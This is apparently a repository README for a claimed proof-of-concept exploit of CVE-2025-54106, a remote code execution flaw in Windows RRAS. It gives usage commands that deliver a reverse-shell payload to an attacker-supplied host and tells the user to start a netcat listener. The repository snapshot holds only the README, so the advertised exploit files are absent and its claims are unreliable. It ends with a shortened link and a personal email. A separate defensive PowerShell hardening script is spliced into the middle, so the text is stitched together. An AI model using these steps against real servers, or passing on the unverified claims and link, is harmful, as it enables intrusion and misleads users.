
CVE-2025-54106 PoC — Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability

Associated Vulnerability
Title: Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability (CVE-2025-54106)
Description: Integer overflow or wraparound in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to execute code over a network.
Readme
# CVE-2025-54106 - Windows RRAS Integer Overflow Exploit

## Overview

This repository provides a proof-of-concept (PoC) exploit for CVE-2025-54106, a critical integer overflow vulnerability in the Routing and Remote Access Service (RRAS) component of Microsoft Windows Server versions from 2012 R2 up to 2022 23H2. The vulnerability allows remote code execution (RCE) without authentication by sending specially crafted network packets that trigger an integer wraparound during packet processing.

The exploit targets the RRAS service, typically exposed on ports like 1701 (L2TP), 1723 (PPTP), or others depending on configuration. It exploits an integer overflow in the handling of routing table entries or connection parameters, leading to memory corruption and arbitrary code execution in SYSTEM context.

This PoC is for educational and security research purposes only. It demonstrates the vulnerability in a controlled lab environment. Do not use on production systems or without permission.

## Requirements

- Python 3.10 or higher
- Access to a vulnerable Windows Server instance with RRAS enabled and exposed
- Attacker machine on the same network or with remote access to the target
- Tested on:
  - Windows Server 2022 23H2 (Build 20348.2527)
  - Windows Server 2019 (Build 17763.5936)


## Usage

The main exploit script is `exploit.py`. It crafts and sends malformed packets to trigger the overflow.

### Basic Command
```
python exploit.py --target <TARGET_IP> --port <PORT> --payload <PAYLOAD_TYPE> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
```

- `--target`: IP address of the vulnerable RRAS server.
- `--port`: Port where RRAS is listening (default: 1701 for L2TP).
- `--payload`: Type of payload to deliver (e.g., `reverse_shell`).
- `--lhost`: Attacker's IP for reverse connections.
- `--lport`: Attacker's listening port (default: 4444).
- `--verbose`: Enable detailed output (optional).

### Example

**Reverse Shell:**

```
python exploit.py --target 192.168.1.100 --port 1701 --payload reverse_shell --lhost 192.168.1.50 --lport 4444
```

Start a listener on your machine (e.g., `nc -lvnp 4444`) before running.

### Payload Customization
Custom payloads can be added in the `payloads/` directory. See `payloads/reverse_shell.bin` for an example.


### Mitigation
- Apply the official patch from Microsoft: [MSRC Advisory](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54106).
- Disable RRAS if not needed.
- Use firewalls to restrict access to RRAS ports.
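The three mitigation steps above can be audited and applied from an elevated PowerShell session on the server itself. The following script is an added example for defenders and is not part of this repository. It assumes RRAS runs as the Windows service named `RemoteAccess`, uses the ports the README names (1701/UDP for L2TP, 1723/TCP for PPTP), and leaves `$AllowedVpnPeers` and `$PatchKB` as placeholders: take the KB identifier from the MSRC advisory linked above and list only the networks that legitimately reach your VPN endpoint.

```powershell
# Added example, not part of the CVE-2025-54106 repository: audit RRAS exposure
# and apply the Mitigation steps (patch check, disable if unused, restrict by firewall).
# Assumptions: RRAS runs as the Windows service "RemoteAccess"; ports come from the
# README (1701/UDP L2TP, 1723/TCP PPTP); $AllowedVpnPeers and $PatchKB are placeholders.

$AllowedVpnPeers = @('203.0.113.0/24')   # placeholder: networks allowed to reach RRAS
$PatchKB         = 'KB0000000'           # placeholder: KB id from the MSRC advisory
$RrasRequired    = $true                 # set to $false to disable the service outright

# 1. Is the fix installed?
if (Get-HotFix -Id $PatchKB -ErrorAction SilentlyContinue) {
    Write-Output "$PatchKB present"
} else {
    Write-Warning "$PatchKB not found; host may still be exposed to CVE-2025-54106"
}

# 2. Is RRAS installed and running, and is anything bound to its ports?
$svc = Get-Service -Name 'RemoteAccess' -ErrorAction SilentlyContinue
if ($null -eq $svc) {
    Write-Output 'RRAS (RemoteAccess) service not present on this host'
    return
}
Write-Output ("RRAS status={0} starttype={1}" -f $svc.Status, $svc.StartType)
Get-NetUDPEndpoint -LocalPort 1701 -ErrorAction SilentlyContinue |
    Select-Object LocalAddress, LocalPort, OwningProcess
Get-NetTCPConnection -LocalPort 1723 -State Listen -ErrorAction SilentlyContinue |
    Select-Object LocalAddress, LocalPort, OwningProcess

# 3a. Not needed: stop and disable it ("Disable RRAS if not needed").
if (-not $RrasRequired) {
    Stop-Service -Name 'RemoteAccess' -Force
    Set-Service  -Name 'RemoteAccess' -StartupType Disabled
    return
}

# 3b. Needed: narrow every enabled inbound Allow rule for the RRAS ports to the
# trusted peer list. Do not add a separate Block rule next to an Allow rule for
# the same port: Windows Firewall evaluates Block before Allow, so that would
# cut off the trusted peers as well.
$rrasRules = Get-NetFirewallPortFilter |
    Where-Object { $_.LocalPort -in @('1701', '1723') } |
    Get-NetFirewallRule |
    Where-Object { $_.Enabled -eq 'True' -and $_.Direction -eq 'Inbound' -and $_.Action -eq 'Allow' }
foreach ($rule in $rrasRules) {
    Set-NetFirewallRule -Name $rule.Name -RemoteAddress $AllowedVpnPeers
    Write-Output "Scoped rule '$($rule.DisplayName)' to $($AllowedVpnPeers -join ', ')"
}
```

Installing the RRAS role creates its own inbound allow rules, so scoping the existing rules with `Set-NetFirewallRule` is what actually reduces reachability; creating a new block rule would override them for everyone. Re-run the listening-port check afterwards, and from an outside host, to confirm the service is no longer reachable from untrusted networks.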

## Files in Folder

- `exploit.py`: Main exploit script.
- `requirements.txt`: Python dependencies.
- `payloads/`: Directory for shellcode and binaries (e.g., `reverse_shell.bin`).
- `docs/`: Additional notes on ROP chains and memory layouts for different server versions.


## Disclaimer

This tool is intended for security professionals and researchers. The author assumes no liability for any damages. Use responsibly and ethically.

[href](https://tinyurl.com/5n9aw3jz)

For any inquiries, please email me at: eviedejesu803@gmail.com
File Snapshot

```
[4.0K] /data/pocs/ec70fad53bdc8460ea9641f8080b32ed9bbb08a7
└── [2.9K] README.md

0 directories, 1 file
```